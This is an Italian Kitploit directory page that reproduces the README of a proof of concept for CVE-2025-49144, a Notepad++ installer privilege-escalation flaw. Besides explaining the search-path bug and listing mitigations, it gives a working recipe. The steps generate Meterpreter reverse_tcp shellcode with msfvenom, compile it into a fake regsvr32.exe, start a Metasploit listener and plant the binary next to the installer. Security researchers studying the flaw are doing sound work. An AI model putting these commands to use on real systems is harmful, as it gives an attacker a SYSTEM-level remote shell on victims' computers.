Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-49144_PoC — CVE-2025-49144 PoC per i ricercatori di sicurezza, da testare e provare. | Kitploit
Strumenti/GitHubGitHub/thetorjancaptain/cve-2025-49144_poc
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitMovimento LateralePenetration TestingApprendimento e FormazioneSviluppo PayloadBinary Exploitation

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
thetorjancaptain/cve-2025-49144_poc

CVE-2025-49144_PoC

CVE-2025-49144 PoC per i ricercatori di sicurezza, da testare e provare.

Vedi Repository
8828591 anno faRevisionato da Kitploit

CVE-2025-49144_PoC

PoC Flow

📌 CVE-2025-49144 è una vulnerabilità di escalation dei privilegi locali ad alta gravità presente nei programmi di installazione di Notepad++ v8.8.1 e versioni precedenti. Questa vulnerabilità deriva da un comportamento incontrollato del percorso di ricerca degli eseguibili durante l'installazione, che consente a un attaccante locale di ottenere privilegi a livello di SYSTEM posizionando eseguibili dannosi nella stessa directory del programma di installazione.


⚙️ Come funziona la CVE – Passo dopo passo:

🧱 1. Cosa non ha funzionato nel programma di installazione?

Il programma di installazione di Notepad++ (prima della v8.8.2) chiama regsvr32.exe per registrare alcuni componenti — ma lo fa senza specificare il percorso completo (come C:\Windows\System32\regsvr32.exe).

Invece, esegue semplicemente:

regsvr32.exe some_dll

📂 2. Comportamento del percorso di ricerca di Windows: Quando un eseguibile viene avviato senza un percorso completo, Windows utilizza un ordine di ricerca specifico per trovare il file:

  1. La cartella da cui è stata avviata l'applicazione (es. Downloads)

  2. La cartella di sistema (System32)

  3. La cartella di Windows

  4. La directory di lavoro corrente

  5. I percorsi nella variabile d'ambiente PATH

Quindi, se un falso regsvr32.exe viene posizionato nella stessa cartella del programma di installazione (es. Downloads), Windows lo utilizzerà prima di quello reale.

💣 3. Sfruttamento:

- L'attaccante posiziona un regsvr32.exe dannoso nella stessa cartella del programma di installazione legittimo di Notepad++ (es. la cartella Downloads della vittima).

- La vittima esegue il programma di installazione (pensando che sia sicuro).

- Il programma di installazione chiama regsvr32.exe, ma finisce per eseguire quello dannoso dalla stessa cartella — con privilegi SYSTEM (perché i programmi di installazione richiedono in genere autorizzazioni di amministratore).

- Il payload dell'attaccante ora viene eseguito come NT AUTHORITY\SYSTEM.

⚙️ Passaggi per riprodurre:

  1. Ottieni lo shellcode:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<your-ip> LPORT=4444 -f c > shellcode.txt
  1. Scarica il file "regsvr32_loader.c" e modificalo.
  2. Incolla l'intero shellcode da shellcode.txt nel commento indicato.
  3. Compila in regsvr32.exe:
x86_64-w64-mingw32-gcc regsvr32_loader.c -o regsvr32.exe -mwindows
  1. Avvia un listener meterpreter:
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST X.X.X.X
set LPORT 4444
run
  1. Scarica una versione vulnerabile di Notepad++, cioè precedente alla 8.8.1, poiché la 8.8.1 ora viene aggiornata automaticamente. Per la PoC ho usato Notepad++ v8.6.8
  2. Sposta il file "regsvr32.exe" nel sistema Windows, nella stessa cartella del programma di installazione di Notepad++, probabilmente nella cartella Downloads.
  3. Completa l'installazione tramite il programma di installazione di Notepad++.

Nota: Questa è una PoC, quindi è stata testata con Windows Defender e la protezione in tempo reale disabilitate.


✅ Mitigazione

Gli utenti e gli amministratori dovrebbero:

  • Aggiornare a Notepad++ v8.8.2 o versioni successive

  • Limitare l'installazione del software ad amministratori fidati

  • Utilizzare AppLocker, WDAC o i Criteri di restrizione software (SRP) per:

    • Bloccare l'esecuzione da cartelle scrivibili dagli utenti (es. Downloads)
    • Impedire l'esecuzione di binari non attendibili come regsvr32.exe da percorsi non autorizzati
    • Imporre la firma del codice per gli eseguibili

I team di sicurezza dovrebbero controllare regolarmente i percorsi di installazione, monitorare i permessi di scrittura e osservare il comportamento durante l'esecuzione del programma di installazione per ridurre la superficie d'attacco.


🏷️ Licenza

Licenza MIT — Gratuita solo per scopi educativi, di ricerca e difensivi.


🤝 Contributi

Pull Request benvenute — migliora il rilevamento, aggiungi funzionalità o suggerisci correzioni.


⚠️ Avvertenza

Questa PoC è solo a scopo educativo e di ricerca. Usala a tuo rischio e pericolo. L'autore non è responsabile per qualsiasi uso improprio o danno causato.

Scarica lo strumento